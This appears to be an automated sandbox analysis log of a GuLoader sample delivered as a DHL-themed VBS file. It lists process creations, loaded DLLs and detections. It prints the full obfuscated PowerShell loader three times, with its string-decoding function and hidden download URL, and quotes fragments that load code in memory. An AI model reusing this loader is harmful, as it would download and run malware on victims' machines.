            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wisucaoa.tgs.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6160
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$PadleJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nonscalar)$global:Abet226 = [System.Text.Encoding]::ASCII.GetString($Galluptallenes29)$global:Unsweltering=$Abet226.substring($Firetogs123,$Stjrthagerne)<#protyl Mccracken chorizatio
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gaardrydningers $Ultratense $Listeformers), (Vandomraaderne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tetrabrach = [AppDomain]::CurrentDomain.GetAsse
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Speltens192)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($fluffier, $false).DefineType($Kamikazepiloten
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nonscalar)$global:Abet226 = [System.Text.Encoding]::ASCII.GetString($Galluptallenes29)$global:Unsweltering=$Abet226.substring($Firetogs123,$Stjrthagerne)<#protyl Mccracken chorizatio
            Obfuscated command line found
